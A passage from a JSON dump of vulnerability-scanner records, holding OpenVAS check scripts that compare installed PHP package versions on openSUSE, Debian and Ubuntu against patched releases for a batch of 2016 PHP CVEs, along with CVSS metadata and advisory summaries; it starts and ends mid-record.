}\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-sockets-debuginfo\", rpm:\"php5-sockets-debuginfo~5.6.1~78.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-sqlite\", rpm:\"php5-sqlite~5.6.1~78.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-sqlite-debuginfo\", rpm:\"php5-sqlite-debuginfo~5.6.1~78.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-suhosin\", rpm:\"php5-suhosin~5.6.1~78.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-suhosin-debuginfo\", rpm:\"php5-suhosin-debuginfo~5.6.1~78.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-sysvmsg\", rpm:\"php5-sysvmsg~5.6.1~78.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-sysvmsg-debuginfo\", rpm:\"php5-sysvmsg-debuginfo~5.6.1~78.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-sysvsem\", rpm:\"php5-sysvsem~5.6.1~78.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-sysvsem-debuginfo\", rpm:\"php5-sysvsem-debuginfo~5.6.1~78.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-sysvshm\", rpm:\"php5-sysvshm~5.6.1~78.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-sysvshm-debuginfo\", rpm:\"php5-sysvshm-debuginfo~5.6.1~78.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-tidy\", rpm:\"php5-tidy~5.6.1~78.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-tidy-debuginfo\", rpm:\"php5-tidy-debuginfo~5.6.1~78.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-tokenizer\", rpm:\"php5-tokenizer~5.6.1~78.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-tokenizer-debuginfo\", rpm:\"php5-tokenizer-debuginfo~5.6.1~78.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-wddx\", rpm:\"php5-wddx~5.6.1~78.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-wddx-debuginfo\", rpm:\"php5-wddx-debuginfo~5.6.1~78.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-xmlreader\", rpm:\"php5-xmlreader~5.6.1~78.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-xmlreader-debuginfo\", rpm:\"php5-xmlreader-debuginfo~5.6.1~78.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-xmlrpc\", rpm:\"php5-xmlrpc~5.6.1~78.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-xmlrpc-debuginfo\", rpm:\"php5-xmlrpc-debuginfo~5.6.1~78.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-xmlwriter\", rpm:\"php5-xmlwriter~5.6.1~78.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-xmlwriter-debuginfo\", rpm:\"php5-xmlwriter-debuginfo~5.6.1~78.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-xsl\", rpm:\"php5-xsl~5.6.1~78.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-xsl-debuginfo\", rpm:\"php5-xsl-debuginfo~5.6.1~78.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-zip\", rpm:\"php5-zip~5.6.1~78.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-zip-debuginfo\", rpm:\"php5-zip-debuginfo~5.6.1~78.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-zlib\", rpm:\"php5-zlib~5.6.1~78.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-zlib-debuginfo\", rpm:\"php5-zlib-debuginfo~5.6.1~78.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-pear\", rpm:\"php5-pear~5.6.1~78.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:35:49", "description": "Several vulnerabilities were found in PHP,\na general-purpose scripting language commonly used for web application development.\n\nThe vulnerabilities are addressed by upgrading PHP to the new upstream\nversion 5.6.26, which includes additional bug fixes.", "cvss3": {}, "published": "2016-10-08T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 3689-1 (php5 - security update)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-7414", "CVE-2016-7127", "CVE-2016-7131", "CVE-2016-7125", "CVE-2016-7130", "CVE-2016-7129", "CVE-2016-7413", "CVE-2016-7126", "CVE-2016-7416", "CVE-2016-7411", "CVE-2016-7124", "CVE-2016-7417", "CVE-2016-7128", "CVE-2016-7418", "CVE-2016-7132", "CVE-2016-7412"], "modified": "2019-03-18T00:00:00", "id": "OPENVAS:1361412562310703689", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310703689", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3689.nasl 14279 2019-03-18 14:48:34Z cfischer $\n# Auto-generated from advisory DSA 3689-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.703689\");\n script_version(\"$Revision: 14279 $\");\n script_cve_id(\"CVE-2016-7124\", \"CVE-2016-7125\", \"CVE-2016-7126\", \"CVE-2016-7127\",\n \"CVE-2016-7128\", \"CVE-2016-7129\", \"CVE-2016-7130\", \"CVE-2016-7131\",\n \"CVE-2016-7132\", \"CVE-2016-7411\", \"CVE-2016-7412\", \"CVE-2016-7413\",\n \"CVE-2016-7414\", \"CVE-2016-7416\", \"CVE-2016-7417\", \"CVE-2016-7418\");\n script_name(\"Debian Security Advisory DSA 3689-1 (php5 - security update)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:48:34 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-10-08 00:00:00 +0200 (Sat, 08 Oct 2016)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2016/dsa-3689.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB8\");\n script_tag(name:\"affected\", value:\"php5 on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the stable distribution (jessie),\nthese problems have been fixed in version 5.6.26+dfsg-0+deb8u1.\n\nWe recommend that you upgrade your php5 packages.\");\n script_tag(name:\"summary\", value:\"Several vulnerabilities were found in PHP,\na general-purpose scripting language commonly used for web application development.\n\nThe vulnerabilities are addressed by upgrading PHP to the new upstream\nversion 5.6.26, which includes additional bug fixes.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software\nversion using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"libapache2-mod-php5\", ver:\"5.6.26+dfsg-0+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libapache2-mod-php5filter\", ver:\"5.6.26+dfsg-0+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libphp5-embed\", ver:\"5.6.26+dfsg-0+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php-pear\", ver:\"5.6.26+dfsg-0+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5\", ver:\"5.6.26+dfsg-0+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-cgi\", ver:\"5.6.26+dfsg-0+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-cli\", ver:\"5.6.26+dfsg-0+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-common\", ver:\"5.6.26+dfsg-0+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-curl\", ver:\"5.6.26+dfsg-0+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-dbg\", ver:\"5.6.26+dfsg-0+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-dev\", ver:\"5.6.26+dfsg-0+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-enchant\", ver:\"5.6.26+dfsg-0+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-fpm\", ver:\"5.6.26+dfsg-0+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-gd\", ver:\"5.6.26+dfsg-0+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-gmp\", ver:\"5.6.26+dfsg-0+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-imap\", ver:\"5.6.26+dfsg-0+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-interbase\", ver:\"5.6.26+dfsg-0+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-intl\", ver:\"5.6.26+dfsg-0+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-ldap\", ver:\"5.6.26+dfsg-0+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-mcrypt\", ver:\"5.6.26+dfsg-0+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-mysql\", ver:\"5.6.26+dfsg-0+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-mysqlnd\", ver:\"5.6.26+dfsg-0+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-odbc\", ver:\"5.6.26+dfsg-0+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-pgsql\", ver:\"5.6.26+dfsg-0+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-phpdbg\", ver:\"5.6.26+dfsg-0+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-pspell\", ver:\"5.6.26+dfsg-0+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-readline\", ver:\"5.6.26+dfsg-0+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-recode\", ver:\"5.6.26+dfsg-0+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-snmp\", ver:\"5.6.26+dfsg-0+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-sqlite\", ver:\"5.6.26+dfsg-0+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-sybase\", ver:\"5.6.26+dfsg-0+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-tidy\", ver:\"5.6.26+dfsg-0+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-xmlrpc\", ver:\"5.6.26+dfsg-0+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-xsl\", ver:\"5.6.26+dfsg-0+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2017-07-24T12:54:34", "description": "Several vulnerabilities were found in PHP,\na general-purpose scripting language commonly used for web application development.\n\nThe vulnerabilities are addressed by upgrading PHP to the new upstream\nversion 5.6.26, which includes additional bug fixes. Please refer to the\nupstream changelog for more information:\n\nhttps://php.net/ChangeLog-5.php#5.6.25https://php.net/ChangeLog-5.php#5.6.26", "cvss3": {}, "published": "2016-10-08T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 3689-1 (php5 - security update)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-7414", "CVE-2016-7127", "CVE-2016-7131", "CVE-2016-7125", "CVE-2016-7130", "CVE-2016-7129", "CVE-2016-7413", "CVE-2016-7126", "CVE-2016-7416", "CVE-2016-7411", "CVE-2016-7124", "CVE-2016-7417", "CVE-2016-7128", "CVE-2016-7418", "CVE-2016-7132", "CVE-2016-7412"], "modified": "2017-07-07T00:00:00", "id": "OPENVAS:703689", "href": "http://plugins.openvas.org/nasl.php?oid=703689", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3689.nasl 6608 2017-07-07 12:05:05Z cfischer $\n# Auto-generated from advisory DSA 3689-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\n\nif(description)\n{\n script_id(703689);\n script_version(\"$Revision: 6608 $\");\n script_cve_id(\"CVE-2016-7124\", \"CVE-2016-7125\", \"CVE-2016-7126\", \"CVE-2016-7127\",\n \"CVE-2016-7128\", \"CVE-2016-7129\", \"CVE-2016-7130\", \"CVE-2016-7131\",\n \"CVE-2016-7132\", \"CVE-2016-7411\", \"CVE-2016-7412\", \"CVE-2016-7413\",\n \"CVE-2016-7414\", \"CVE-2016-7416\", \"CVE-2016-7417\", \"CVE-2016-7418\");\n script_name(\"Debian Security Advisory DSA 3689-1 (php5 - security update)\");\n script_tag(name: \"last_modification\", value: \"$Date: 2017-07-07 14:05:05 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name: \"creation_date\", value: \"2016-10-08 00:00:00 +0200 (Sat, 08 Oct 2016)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name: \"solution_type\", value: \"VendorFix\");\n script_tag(name: \"qod_type\", value: \"package\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2016/dsa-3689.html\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: \"php5 on Debian Linux\");\n script_tag(name: \"insight\", value: \"This package is a metapackage that,\nwhen installed, guarantees that you have at least one of the four server-side\nversions of the PHP5 interpreter installed. Removing this package won't remove\nPHP5 from your system, however it may remove other packages that depend on this\none.\");\n script_tag(name: \"solution\", value: \"For the stable distribution (jessie),\nthese problems have been fixed in version 5.6.26+dfsg-0+deb8u1.\n\nWe recommend that you upgrade your php5 packages.\");\n script_tag(name: \"summary\", value: \"Several vulnerabilities were found in PHP,\na general-purpose scripting language commonly used for web application development.\n\nThe vulnerabilities are addressed by upgrading PHP to the new upstream\nversion 5.6.26, which includes additional bug fixes. Please refer to the\nupstream changelog for more information:\n\nhttps://php.net/ChangeLog-5.php#5.6.25https://php.net/ChangeLog-5.php#5.6.26\");\n script_tag(name: \"vuldetect\", value: \"This check tests the installed software\nversion using the apt package manager.\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"libapache2-mod-php5\", ver:\"5.6.26+dfsg-0+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libapache2-mod-php5filter\", ver:\"5.6.26+dfsg-0+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libphp5-embed\", ver:\"5.6.26+dfsg-0+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php-pear\", ver:\"5.6.26+dfsg-0+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5\", ver:\"5.6.26+dfsg-0+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-cgi\", ver:\"5.6.26+dfsg-0+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-cli\", ver:\"5.6.26+dfsg-0+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-common\", ver:\"5.6.26+dfsg-0+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-curl\", ver:\"5.6.26+dfsg-0+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-dbg\", ver:\"5.6.26+dfsg-0+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-dev\", ver:\"5.6.26+dfsg-0+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-enchant\", ver:\"5.6.26+dfsg-0+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-fpm\", ver:\"5.6.26+dfsg-0+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-gd\", ver:\"5.6.26+dfsg-0+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-gmp\", ver:\"5.6.26+dfsg-0+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-imap\", ver:\"5.6.26+dfsg-0+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-interbase\", ver:\"5.6.26+dfsg-0+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-intl\", ver:\"5.6.26+dfsg-0+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-ldap\", ver:\"5.6.26+dfsg-0+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-mcrypt\", ver:\"5.6.26+dfsg-0+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-mysql\", ver:\"5.6.26+dfsg-0+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-mysqlnd\", ver:\"5.6.26+dfsg-0+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-odbc\", ver:\"5.6.26+dfsg-0+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-pgsql\", ver:\"5.6.26+dfsg-0+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-phpdbg\", ver:\"5.6.26+dfsg-0+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-pspell\", ver:\"5.6.26+dfsg-0+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-readline\", ver:\"5.6.26+dfsg-0+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-recode\", ver:\"5.6.26+dfsg-0+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-snmp\", ver:\"5.6.26+dfsg-0+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-sqlite\", ver:\"5.6.26+dfsg-0+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-sybase\", ver:\"5.6.26+dfsg-0+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-tidy\", ver:\"5.6.26+dfsg-0+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-xmlrpc\", ver:\"5.6.26+dfsg-0+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-xsl\", ver:\"5.6.26+dfsg-0+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:35:26", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2016-10-05T00:00:00", "type": "openvas", "title": "Ubuntu Update for php7.0 USN-3095-1", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-7414", "CVE-2016-7127", "CVE-2016-7133", "CVE-2016-7131", "CVE-2016-7125", "CVE-2016-7134", "CVE-2016-7130", "CVE-2016-7129", "CVE-2016-7413", "CVE-2016-7416", "CVE-2016-7411", "CVE-2016-7124", "CVE-2016-7417", "CVE-2016-7128", "CVE-2016-7418", "CVE-2016-7132", "CVE-2016-7412"], "modified": "2019-03-13T00:00:00", "id": "OPENVAS:1361412562310842904", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310842904", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for php7.0 USN-3095-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.842904\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-10-05 05:43:33 +0200 (Wed, 05 Oct 2016)\");\n script_cve_id(\"CVE-2016-7124\", \"CVE-2016-7125\", \"CVE-2016-7127\", \"CVE-2016-7128\",\n \t\t\"CVE-2016-7129\", \"CVE-2016-7130\", \"CVE-2016-7131\", \"CVE-2016-7132\",\n\t\t\"CVE-2016-7413\", \"CVE-2016-7133\", \"CVE-2016-7134\", \"CVE-2016-7411\",\n\t\t\"CVE-2016-7412\", \"CVE-2016-7414\", \"CVE-2016-7416\", \"CVE-2016-7417\",\n\t\t\"CVE-2016-7418\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for php7.0 USN-3095-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'php7.0'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Taoguang Chen discovered that PHP incorrectly\n handled certain invalid objects when unserializing data. A remote attacker could\n use this issue to cause PHP to crash, resulting in a denial of service, or possibly\n execute arbitrary code. (CVE-2016-7124)\n\nTaoguang Chen discovered that PHP incorrectly handled invalid session\nnames. A 